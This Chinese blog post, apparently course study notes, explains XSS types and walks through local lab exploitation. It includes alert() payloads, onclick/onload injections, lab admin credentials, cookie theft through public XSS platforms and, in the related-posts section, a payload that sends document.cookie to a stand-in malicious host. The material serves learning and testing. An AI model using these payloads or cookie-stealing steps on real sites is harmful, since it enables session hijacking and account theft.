Web漏洞-Xss跨站

已于 2022-05-11 09:48:00 修改
阅读量708 收藏 3
点赞数
分类专栏: 小迪web安全 文章标签: 网络安全 web安全 安全
于 2022-05-05 14:38:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70557959/article/details/124586068
版权

25、Xss跨站之原理分类及攻击方法

原理

XSS 跨站漏洞产生原理,危害,特点?

本质,产生层面,函数类,漏洞操作对应层,危害影响,浏览器内核版本等

本质

跨站脚本攻击是指攻击者往Web页面里插入恶意Script代码,当用户浏览该页时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击的目的

产生层面

前端

函数类

输出类函数

常见的输出函数有: echo printf print print_r sprintf die var-dump var_export

漏洞操作对应层

前端

危害影响

受Javascript代码影响

浏览器内核版本等

浏览器安全策略可能会阻止Js脚本执行

XSS 跨站漏洞分类:反射,存储,DOM

从产生层面,具体区别,危害等级等讲解

反射型:发包 x= xss => x.php => 回包(用后端语言进行数据处理)

存储型:发包 x=xss => x.php =>写到数据库某个表 => x.php => 回显

dom型:发包 x=xss => 本地浏览器静态前端代码 =x.php

用js代码进行处理

反射,又叫非持续型

是一个交互的过程,通过特别的包含Js代码的访问,使页面执行相应的Js代码

需要访问特定内容,或访问特定的链接才可以触发

存储,又叫持续型

与反射型相比,访问提交的Js代码被储存进了网站的数据库

每一个访问该页面的人都会触发代码执行,危害更大

DOM

文档对象模型(Document Object Model),简称DOM,代码在前端,常用于更新当前页面

客户端的脚本程序可以通过DOM动态地检查和修改页面内容,且不依赖与服务器端的交互,而是从客户端获得DOM中的数据在本地执行

如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞

DOM型一般属于反射型

测试代码:#' oncli删掉这串汉字ck="alert(2)">

上传有长度限制

如果输入的信息会上传到地址栏。可以直接在地址栏输入

审查元素,修改“maxlength”也就是长度限制


XSS 常规攻击手法:

平台,工具,结合其他等

利用案例:通过在线留言、在线下单等功能进行跨站攻击,窃取管理员的cookie,登陆后台

cookie session

用户凭据:通过凭据可以判断对方身份信息

cookie 存储在本地 存活时间较长 小中型

session 会话 存储在服务器 存活时间较短 大型 

00x01 js**执行**

Js是浏览器执行的前端语言,用户在存在xss漏洞的站点url后者能输入数据的部分插入js语言,服务器接收到此数据,认为是js代码,从而返回的时候执行。因此,攻击者可利用这个漏洞对站点插入任意js代码进行窃取用户的信息。

00x02 xss**攻击**

XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。

对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。

00x03 XSS**攻击的危害**

  • 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
  • 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
  • 3、盗窃企业重要的具有商业价值的资料
  • 4、非法转账
  • 5、强制发送电子邮件
  • 6、网站挂马
  • 7、控制受害者机器向其它网站发起攻击(重定向语句)
  • 8、窃取cookie的sessionid,冒充登录。

XSS攻击利用到最大就需要自己有台服务器用于窃取信息,还要利用一点社工,骗取别人点击恶意的链接。

00x04 XSS**漏洞的分类**

1.DOM**型(不经过服务器,前端js代码的利用):**

本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。其攻击过程如下所示:

Alice给Bob发送一个恶意构造了Web的URL

Bob点击并查看了这个URL。

恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。

具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。

Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。

2.反射型:

这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。

其攻击过程如下:

Alice经常浏览某个网站,此网站为Bob所拥有。Bob的站点运行Alice使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。

Charly发现Bob的站点包含反射性的XSS漏洞。

Charly编写一个利用漏洞的URL,并将其冒充为来自Bob的邮件发送给Alice。

Alice在登录到Bob的站点后,浏览Charly提供的URL。

嵌入到URL中的恶意脚本在Alice的浏览器中执行,就像它直接来自Bob的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在Alice完全不知情的情况下将这些信息发送到Charly的Web站点。

3.存储型(长久型,危害最大):

该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。其攻击过程如下:

Bob拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。

Charly注意到Bob的站点具有类型C的XSS漏洞。

Charly发布一个热点信息,吸引其它用户纷纷阅读。

Bob或者是任何的其他人如Alice浏览该信息,其会话cookies或者其它信息将被Charly盗走。

类型A直接威胁用户个体,而类型B和类型C所威胁的对象都是企业级Web应用。

一、本地环境XSS,漏洞原理讲解

在phpstudy中根目录创建1.php

<?php

$xss=$_GET['x'];

echo $xss;

?>

浏览器打开,在网址后输入?x=1,网页输出1

输入?x=<script>alert(1)</script>,弹出1

---XSS的本质:如果对方对参数进行回显,传递的参数的的代码就会被回显者的浏览器执行。即对文件显示过程出现了问题。

---本质为前端漏洞,一般执行为js代码,因此危害不大。
#执行效果跟浏览器的版本有关

---ie浏览器,弹窗被拦截


#查看网页源代码(发现被修改了)

---产生与网页前端

 

二、Xss漏洞各个分类差异讲解

利用pikachu靶场

1.反射型XSS(GET)

随意输入字母,发现下面出现了这段字母,网址中也出现了,这段就是输入代码的地方

可以直接在网址message=后输入<script>alert(1)</script>,弹出1

 也可以在输入框中输入<script>alert(1)</script>,但是有长度限制,这里右键检查,更改代码中的maxlength长度,再重新输入弹出1

 2.存储型

在留言板随意输入内容,发现显示在留言列表中,直接在留言板中添加<script>alert(1)</script>,弹出1,与反射型的区别是,每次刷新都会弹出1

 

 

3.Dom

-应用场景:在这种存在查看更多,点击查看更多之后,网站的URL并不会改变。和其它换页不同的是,其它是通过改变URL编号来换页的。 

DOM型xss-x

 随意输入,点击按钮

 然乎点击蓝字内容,出现了另一段话

查看网站源代码

 直接在前端Javascript里执行了

Dom型xss

在输入框输入#'οnclick="alert(1)"> ,出现以下内容点击

出现弹窗1

 三、Xss漏洞代码绕过靶场应用

随意留言板

在phpstudy中搭建

然后在浏览器中打开http://10.245.4.79/liuyanban,进行相应留言,在留言板中输入<BODY οnlοad="alert('XSS')">

管理员地址http://10.245.4.79/liuyanban/index.php?c=admin&a=index

管理员账号admin,密码admin888

查看留言,点击管理留言

 弹出xss弹窗

 四、XSS平台及工具简要演示测试

1.手动实操

登录xss平台

 创建项目,输入名称和描述

 点击超强默认模块

查看代码

选择一个代码输入到留言板中,一个不行换另一

输入到留言板中

  管理员查看出现弹窗

 右键点击检查查看网络所有,发现有 在xss平台上设置项目的地址。

  查看xss平台,按理说应该有cookie,没有可能是浏览器问题或者平台问题,换条命令可以试试

 这里从网络抓包中假设获取到cookie

 可以利用Burp suite抓包更改cookie

模块应用基础认证钓鱼模块

点击项目配置选择这个模块复制代码,重新在留言板中提交

 

本地查看代码效果,创建一个1.html输入代码

在浏览器查看 啥也没有不建议使用

2.项目展示

 这里浏览器输入值下面也就显示了,符合跨站漏洞条件

输入语句,弹出1 

 项目勾选读取cookie,可以把创建项目代码,输入到这里

需要先登陆后台,盗取登陆的cookie

查看项目,接收到cookie

资源

xss平台:https://xss8.cc/xss.php?do=login

xss平台:https://xsshs.cn/xss.php?do=login

xss-labs:https://github.com/do0dl3/xss-labs

随意多功能留言板 SyGuestBook:http://down.chinaz.com/soft/37581.htm 

DDdd...
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web漏洞利用
Z_nannan的博客
05-07 466
一、SQL注入 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对Web服务器进行攻击的方法。 1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。输入1提交,将正常返回查询结果。输入1’提交,将返回一个错误。 2、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。 输入1' union select 1,database()#提交,得到数据库名
Web-XSS漏洞
weixin_43916678的博客
05-01 1035
XSS攻击(跨站脚本攻击)是指攻击者利用网站程序对用户输入过滤不足的缺陷,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 XSS攻击主要影响的是用户端的安全,包含用户信息安全、权限安全等。并且多数XSS攻击都依赖于JavaScript脚本开展。 核心要求是构造出能够让前端执行的JS代码,让攻击者的JS代码在受害者浏览器上执行,攻击系统用户而不是系统本身。 JS运行条件:代码位于< script >标签中、代
Web 应用常见漏洞利用与防护
zzxl212333的博客
03-22 906
数据库基本单位数据库服务器∶是指用来运行数据库服务的一台电脑。数据库:(一个数据库服务器里面有可以有多个数据库。数据表∶例如在游戏数据库中,用来区分游戏不同的数据。数据字段∶也叫数据列。就是我们日常所见表格里面的列。数据行∶真正的数据存在每一个表的行里面。常用的SQL语句。
实训1-利用Web漏洞入侵网站并控制服务器
最新发布
zlLzH18的博客
05-09 942
1、端口扫描的目的是什么?端口扫描是指某些别有用心的人发送一组端口扫描消息,试图以此侵入某台计算机,并了解其提供的计算机网络服务类型(这些网络服务均与端口号相关)。端口扫描是计算机解密高手喜欢的一种方式。攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上,端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。2、漏洞扫描的目的是什么?获取某范围内的端口某未知属性的状态:这种情况下,一般是不知道对方情况,只是想通过扫描进行查找。
Web 常见十大漏洞原理及利用方式
weixin_45947267的博客
04-18 1852
文件包含一个文件调用另外一个文件,被包含的文件无论什么格式都可以被执行。序列化serialize():序列化说通俗点就是把一个对象变成可以传输的字符串反序列化unserialize():就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题常见的几个魔法函数:__construct()当一个对象创建时被调用__destruct()当一个对象销毁时被调用。
黑客教你如何Web漏洞快速挖掘思路以及实操
yz_weixiao的博客
04-27 1573
我这里还有渗透测试\web安全/攻防/src漏洞讲解/只要是关于网络安全的部分,应该都有!还有两三千本电子书籍!以及自己整理出的一套学习路线!告别低效率的学习!1.1爱站工具网和站长网都可以查询到域名的相关信息如域名服务商,域名拥有者,以及邮箱电话,地址等信息)网站的关于页面/网站地图(可查询到企业的相关信息介绍,如域名备案信息查询:域传输漏洞:dig baidu.com。利用以上收集到的邮箱、QQ、电话号码、姓名、以及域名服务商可以用来社工客户或者渗透域服务商,拿下域管理控制台,然后做域劫持;
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
**XSS跨站脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
web漏洞利用与原理(课程实训)
qq_70288605的博客
04-15 1232
7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。5、输入1' union select 1,database()#提交,得到数据库名称。
随意php开源多功能留言板,随意多功能留言板 SyGuestBook v1.2
weixin_32306885的博客
03-28 582
随意多功能留言板 SyGuestBook v1.2 更新日志版本:涵盖全部版本问题:解决留言板首页打开慢的问题原因:用了好几年的新浪IP转换地址的接口失效了,导致网页要请求很久只到失败才能显示(将近30秒),问题已解决随意多功能留言板 SyGuestBook 简介随意多功能留言板SyGuestBook软件是一个以php+MySQL继续开发的多功能留言板系统。随意多功能留言板 SyGuestBook...
Web安全 学习日记7 - XSS跨站脚本攻击)
qq_46081990的博客
03-12 330
htmlspecialchars() // 把预定义的字符 & 、”、 ’、 < 、 > 转换为 HTML 实体,防止浏览器将其作为HTML元素trim(string,charlist) // 移除 string 两侧的空格或其他预定义字符,可选参数charlist支持添加额外需要删除的字符。mysql_real_escape_string(string,connection) // 函数会对字符串中的特殊符号( \ x00, \ n, \ r, \ ,',", \ x1a)进行转义。
常见web安全漏洞_web漏洞
xnxqwzy的博客
10-27 654
​ “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
十二个常见的Web安全漏洞总结及防范措施
dzqxwzoe的博客
11-12 1159
本篇文章部分摘要自《OWASP Top 10 2017》。OWASP,开放式Web应用程序安全项目(Open Web Application Security Project)是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。
Web安全相关(三):开放重定向(Open Redirection)
weixin_30401605的博客
05-19 807
简介   那些通过请求(如查询字符串和表单数据)指定重定向URL的Web程序可能会被篡改,而把用户重定向到外部的恶意URL。这种篡改就被称为开发重定向攻击。 场景分析   假设有一个正规网站http://nerddinner.com/,还有一个恶意网站或钓鱼网站http://nerddiner.com/(注意:这里少了个n)。   一天,小白收到了别人发的链接:ht...
xss跨站脚本攻击实操
05-14
XSS跨站脚本攻击)是一种常见的Web攻击,攻击者通过注入恶意脚本代码,使得用户在访问网站时受到攻击,例如窃取用户的敏感信息、篡改页面内容等。在实操中,我们可以通过以下步骤来演示XSS攻击: 1. 编写一个简单的HTML页面 ``` <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>XSS Demo</title> </head> <body> <h1>XSS Demo</h1> <p id="content">This is a demo page.</p> <script> var name = prompt('Please enter your name:'); document.getElementById('content').innerHTML = 'Hello, ' + name + '!'; </script> </body> </html> ``` 这个页面包含一个简单的JavaScript脚本,会提示用户输入名字并将其显示在页面上。 2. 将页面上传到一个Web服务器,并复制页面的URL。 3. 打开一个浏览器窗口,并在地址栏中粘贴页面的URL。页面会被正常加载并显示。 4. 在地址栏中添加以下代码片段并回车: ``` <script>alert('XSS');</script> ``` 此时,页面会弹出一个对话框,显示“XSS”。 5. 再次在地址栏中添加以下代码片段并回车: ``` <script>document.getElementById('content').innerHTML = '<img src="http://your-malicious-website.com/?cookie=' + document.cookie + '"/>';</script> ``` 这个恶意脚本会将用户的cookie信息发送到攻击者的网站。攻击者可以利用这些信息进行Session劫持等攻击。 通过以上步骤,我们可以简单地演示XSS攻击的危害和实现过程。在实际应用中,为了防止XSS攻击,我们需要对输入进行严格的过滤和转义,以保证用户的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DDdd...

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值